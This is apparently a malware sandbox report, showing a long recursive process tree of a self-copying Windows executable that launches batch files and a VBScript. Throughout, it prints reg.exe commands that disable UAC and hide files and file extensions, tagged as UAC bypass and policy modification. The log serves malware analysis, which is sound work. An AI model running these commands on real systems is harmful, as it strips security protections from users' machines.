        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        205⤵
        
        PID:4364
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        205⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        206⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        207⤵
        
        PID:4260
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        208⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mckQYQoU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        208⤵
        
        PID:1684
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        209⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:3896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        208⤵
        UAC bypass
        
        PID:4628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        208⤵
        
        PID:1476
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        209⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3852
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        208⤵
        
        PID:2480
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        209⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        206⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1140
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        207⤵
        UAC bypass
        
        PID:3008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uKYAEwkU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        206⤵
        
        PID:4660
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        207⤵
        
        PID:812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        206⤵
        
        PID:564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        206⤵
        UAC bypass
        
        PID:1644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KgcMMEwI.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        204⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4776
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        205⤵
        UAC bypass
        
        PID:3620
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        205⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        204⤵
        
        PID:1728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        204⤵
        
        PID:4976
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        204⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        202⤵
        
        PID:2100
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        203⤵
        
        PID:4564
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        202⤵
        
        PID:3424
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        203⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rUcwwkAc.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        202⤵
        
        PID:920
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        203⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        202⤵
        UAC bypass
        Modifies registry key
        
        PID:1992
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        203⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        200⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        200⤵
        
        PID:2412
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        201⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        200⤵
        
        PID:1296
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NcwEoQsU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        200⤵
        
        PID:1712
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        201⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        201⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        198⤵
        UAC bypass
        
        PID:2920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        199⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xKoYUwUo.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        198⤵
        
        PID:436
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        199⤵
        
        PID:316
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        198⤵
        Modifies registry key
        
        PID:4524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        198⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        196⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        196⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        196⤵
        UAC bypass
        
        PID:3684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        197⤵
        
        PID:4156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jwQkAEow.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        196⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        197⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uCIcoUQw.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        194⤵
        
        PID:4164
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        195⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        195⤵
        
        PID:3248
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        194⤵
        UAC bypass
        Modifies registry key
        
        PID:4236
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        195⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        194⤵
        
        PID:2100
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        195⤵
        
        PID:1892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        194⤵
        
        PID:708
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        195⤵
        
        PID:496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iwQIoIws.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        192⤵
        
        PID:704
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        193⤵
        
        PID:1144
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        193⤵
        
        PID:1084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        192⤵
        UAC bypass
        
        PID:4340
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        193⤵
        UAC bypass
        
        PID:1300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        192⤵
        
        PID:3476
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        193⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        192⤵
        Modifies registry key
        
        PID:1828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vmMUAMYE.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        190⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        191⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        190⤵
        Modifies registry key
        
        PID:3620
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        190⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        190⤵
        
        PID:436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BWwsogUY.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        188⤵
        
        PID:2700
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        189⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        189⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        188⤵
        UAC bypass
        
        PID:4576
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        189⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        188⤵
        Modifies registry key
        
        PID:2944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        188⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HicgYMcs.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        186⤵
        
        PID:2128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        187⤵
        UAC bypass
        
        PID:4176
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        187⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        186⤵
        UAC bypass
        
        PID:3256
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        187⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        186⤵
        UAC bypass
        
        PID:1092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        186⤵
        
        PID:2780
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\raooscEM.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        184⤵
        
        PID:1292
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        185⤵
        
        PID:920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        184⤵
        UAC bypass
        
        PID:4192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        184⤵
        
        PID:708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        184⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\diUgwMAk.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        182⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        183⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:4160
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        182⤵
        
        PID:1828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        183⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        182⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4780
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        182⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4140
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        182⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        180⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        180⤵
        UAC bypass
        Modifies registry key
        
        PID:4768
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        181⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        180⤵
        
        PID:1456
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        181⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:552
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wccMAQIc.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        180⤵
        
        PID:932
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        181⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        178⤵
        Modifies registry key
        
        PID:3224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        178⤵
        
        PID:4424
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        179⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        178⤵
        UAC bypass
        
        PID:4720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EEUQEgks.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        178⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        179⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        176⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:4964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yyoAQwQI.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        176⤵
        
        PID:1364
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        177⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        176⤵
        
        PID:2288
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        177⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        176⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eGkogwwY.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        174⤵
        
        PID:4816
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        175⤵
        
        PID:4032
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        175⤵
        
        PID:3712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        174⤵
        UAC bypass
        
        PID:8
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        174⤵
        Modifies registry key
        
        PID:4224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        174⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4804
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        172⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3056
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        173⤵
        
        PID:4212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        172⤵
        Modifies registry key
        
        PID:4636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        172⤵
        UAC bypass
        
        PID:3600
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        173⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZiYgAMoE.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        172⤵
        
        PID:4660
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        173⤵
        
        PID:812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        170⤵
        
        PID:4732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        171⤵
        UAC bypass
        
        PID:4392
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        170⤵
        Modifies registry key
        
        PID:752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RKUIkoYE.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        170⤵
        
        PID:3348
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        171⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        
        PID:216
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        171⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        170⤵
        
        PID:1092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        171⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TeEIAQwI.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        168⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        169⤵
        
        PID:3052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        168⤵
        Modifies registry key
        
        PID:4740
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        168⤵
        Modifies registry key
        
        PID:1804
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        168⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        166⤵
        Modifies registry key
        
        PID:3852
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        166⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5016
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        167⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        166⤵
        
        PID:1284
        
        C:\Windows\SysWOW64\cmd.exe
        
